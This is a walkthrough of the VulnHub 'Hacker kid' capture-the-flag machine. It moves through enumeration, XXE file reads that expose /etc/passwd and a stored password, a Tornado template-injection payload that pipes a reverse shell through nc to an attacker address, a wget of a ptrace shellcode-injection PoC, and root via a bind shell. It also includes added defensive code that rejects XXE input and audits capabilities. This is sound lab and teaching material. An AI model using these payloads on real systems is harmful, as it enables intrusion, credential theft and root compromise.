VulnHub Hacker kid: 1.0.1 Walkthrough
https://www.vulnhub.com/entry/hacker-kid-101,719/
A very good machine; I learned some new things.
Scan all ports. Port 53 (DNS) is the interesting one.
```bash
~ nmap -sV -sC -p- 192.168.33.144 -oN ports.log
...
PORT     STATE SERVICE VERSION
53/tcp   open  domain  ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.16.1-Ubuntu
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Notorious Kid : A Hacker
9999/tcp open  http    Tornado httpd 6.1
|_http-server-header: TornadoServer/6.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Enumerate port 80 with gobuster.
```bash
~ gobuster dir -u http://192.168.33.144 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
...
/images (Status: 301) [Size: 317] [--> http://192.168.33.144/images/]
/index.php (Status: 200) [Size: 3597]
/css (Status: 301) [Size: 314] [--> http://192.168.33.144/css/]
/form.html (Status: 200) [Size: 10219]
/app.html (Status: 200) [Size: 8048]
/javascript (Status: 301) [Size: 321] [--> http://192.168.33.144/javascript/]
```
There is a hint in the index.php source, left in an HTML comment:
```html
<div class="container py-5">
<h1>Thanks</h1>
TO DO: Use a GET parameter page_no to view pages.
-->
```
Fuzz the page_no parameter of index.php, hiding the default-size (3654 byte) responses:
```bash
~ seq 1 100 > dic.txt
~ wfuzz -u 'http://192.168.33.144/index.php?page_no=FUZZ' -w dic.txt --hh 3654
...
=====================================================================
000000021:   200        116 L    310 W      3849 Ch     "21"
```
page_no=21 returns more information:
```bash
~ curl 'http://192.168.33.144/index.php?page_no=21'
<center>
<font color="red">
Okay so you want me to speak something ?<br>I am a hacker kid not a dumb hacker. So i created some subdomains to return back on the server whenever i want!!<br>Out of my many homes...one such home..one such home for me : hackers.blackhat.local<br>
<font color="red">
</center>
```
Query the box's DNS server with dig. The SOA record reveals another hostname, hackerkid.blackhat.local; add it to /etc/hosts.
```bash
~ dig @192.168.33.144 hackers.blackhat.local
...
;; AUTHORITY SECTION:
blackhat.local.  3600  IN  SOA  blackhat.local. hackerkid.blackhat.local. 1 10800 3600 604800 3600
...
```
hackerkid.blackhat.local serves a form that posts XML to process.php, and the backend is vulnerable to XXE (XML External Entity) injection.
```bash
~ curl 'http://hackerkid.blackhat.local/process.php' -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
...
saket:x:1000:1000:Ubuntu,,,:/home/saket:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
bind:x:126:133::/var/cache/bind:/usr/sbin/nologin
```
Read saket's .bashrc, base64-encoded through the php://filter wrapper:

```bash
~ curl 'http://hackerkid.blackhat.local/process.php' -d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/home/saket/.bashrc">]><root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
...
Sorry, IyB+Ly5iYXNocmM6IGV4ZWN1dGVkIGJ5IGJhc2goMSkgZm9yIG5vbi1sb2dpbiBzaGVsbHMuCiMgc2VlIC91c3Ivc2hhcmUvZG9jL2Jhc...
IFBhc3N3b3JkIGZvciBydW5uaW5nIHB5dGhvbiBhcHAKdXNlcm5hbWU9ImFkbWluIgpwYXNzd29yZD0iU2FrZXQhIyQlQCEhIgo= is not available !!!
```
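As an added defensive example (not the walkthrough's code, nor the target's actual process.php, which is assumed to take the four-field XML shown above), this is how the backend could refuse such a submission outright and log which entity it tried to reach:

```python
"""Reject form XML that carries a DTD, and log any external entity it declares.

Added example, not code from the walkthrough or from the target's process.php:
the backend expanded the SYSTEM entity it was sent, so the server-side fix is
to refuse DOCTYPE declarations altogether (the form never needs one).
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample bodies: the first mirrors the walkthrough's payload, the
# second is what the form legitimately submits.
XXE_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    '<root><name></name><tel></tel><email>&xxe;</email><password></password></root>'
)
BENIGN_BODY = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<root><name>saket</name><tel>123</tel><email>a@blackhat.local</email>'
    '<password>x</password></root>'
)

DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.IGNORECASE)
# Matches <!ENTITY name SYSTEM "uri"> and <!ENTITY name PUBLIC "id" "uri">.
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(\w+)\s+(?:SYSTEM|PUBLIC\s+\"[^\"]*\")\s*([\"'])(.*?)\2",
    re.IGNORECASE | re.DOTALL,
)


class XxeRejected(ValueError):
    """Raised when a submission declares a DTD."""


def external_entities(body: str) -> list:
    """Return (entity name, URI) pairs declared in the body, for alerting."""
    return [(m.group(1), m.group(3)) for m in ENTITY_RE.finditer(body)]


def parse_form_xml(body: str) -> dict:
    """Parse the form XML into a field dict, refusing any document with a DTD.

    The check runs on the raw text before the parser sees it, so no entity,
    internal or external, is ever resolved.
    """
    if DOCTYPE_RE.search(body):
        raise XxeRejected(f"DTD not allowed; entities: {external_entities(body)}")
    root = ET.fromstring(body)
    if root.tag != "root":
        raise ValueError("unexpected root element")
    return {child.tag: (child.text or "") for child in root}
```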
Decoding the base64 gives the password for the app on port 9999. The file says the username is "admin", but the login that works is "saket".
```bash
#Setting Password for running python app
username="admin"
password="Saket!#$%@!!"
```
Log in on port 9999.
The page takes a "name" parameter and reflects its value into the response; since the server is Tornado, this is a candidate for template injection.
Submit a template payload as the name parameter to get a reverse shell through nc, then upgrade it to a full shell.
```bash
{%import os%}{{os.system("nc 192.168.33.128 1234|/bin/bash|nc 192.168.33.128 2234")}}
```
Enumerate file capabilities with getcap:
```bash
saket@ubuntu:~$ /sbin/getcap / -r 2>/dev/null
/usr/bin/python2.7 = cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/mtr-packet = cap_net_raw+ep
...
```
> Reference: https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59cc
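An added audit script, not part of the walkthrough, that parses getcap output like the listing above and flags capabilities that are root-equivalent on a normal host; the sample lines are constructed from the post:

```python
"""Audit getcap output for capabilities that hand a local user a path to root.

Added example, not from the walkthrough. The sample below is constructed from
the lines shown in the post; the one it flags is the vector used here.
"""
import re

# Capabilities worth an alert on a general-purpose box, and why.
DANGEROUS = {
    "cap_sys_ptrace": "attach to and rewrite root-owned processes",
    "cap_sys_admin": "broad kernel administration, effectively root",
    "cap_dac_override": "bypass file permission checks",
    "cap_dac_read_search": "read any file, e.g. /etc/shadow",
    "cap_setuid": "switch to uid 0",
}

# Old libcap prints "<path> = <caps>", newer libcap prints "<path> <caps>".
LINE_RE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>.+)$")

SAMPLE_GETCAP = """\
/usr/bin/python2.7 = cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/mtr-packet = cap_net_raw+ep
"""


def parse_getcap(output: str) -> dict:
    """Map each path to its set of capability names (flag suffixes dropped)."""
    caps_by_path = {}
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        # "cap_chown,cap_net_raw+ep cap_sys_admin+i": space-separated groups,
        # comma-separated names; +/=/- flags stripped, name kept whatever e/p/i.
        names = set()
        for group in m.group("caps").split():
            for item in group.split(","):
                name = re.split(r"[+=-]", item, maxsplit=1)[0].lower()
                if name:
                    names.add(name)
        caps_by_path[m.group("path")] = names
    return caps_by_path


def audit(caps_by_path: dict) -> list:
    """Return sorted (path, capability, reason) findings from a parsed map."""
    return sorted((p, c, DANGEROUS[c]) for p, caps in caps_by_path.items()
                  for c in caps if c in DANGEROUS)
```

Feed it the live output of `getcap -r / 2>/dev/null` to check your own hosts; anything it returns is a binary any local user can run with that capability.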
Download the PoC and upload it to the target.
```bash
wget https://gist.githubusercontent.com/wifisecguy/1d69839fe855c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py
```
Pick a process running as root to inject into (here apache2, PID 935):
```bash
saket@ubuntu:~$ ps aux|grep root
...
root   935  0.0  0.4 199776 19968 ?  Ss  12:54  0:00 /usr/sbin/apache2 -k start
...
```
Run the PoC against PID 935, then check the listening ports: a new listener appears on 5600.
```bash
saket@ubuntu:~$ python2.7 inject.py 935
Instruction Pointer: 0x7fd118b560daL
Injecting Shellcode at: 0x7fd118b560daL
Shellcode Injected!!
Final Instruction Pointer: 0x7fd118b560dcL
saket@ubuntu:~$ ss -tnlp
State  Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process ...
LISTEN 0       0       0.0.0.0:5600        0.0.0.0:*          ...
```
Connect to port 5600 for a root shell:
```bash
~ nc 192.168.33.144 5600
id
uid=0(root) gid=0(root) groups=0(root)
```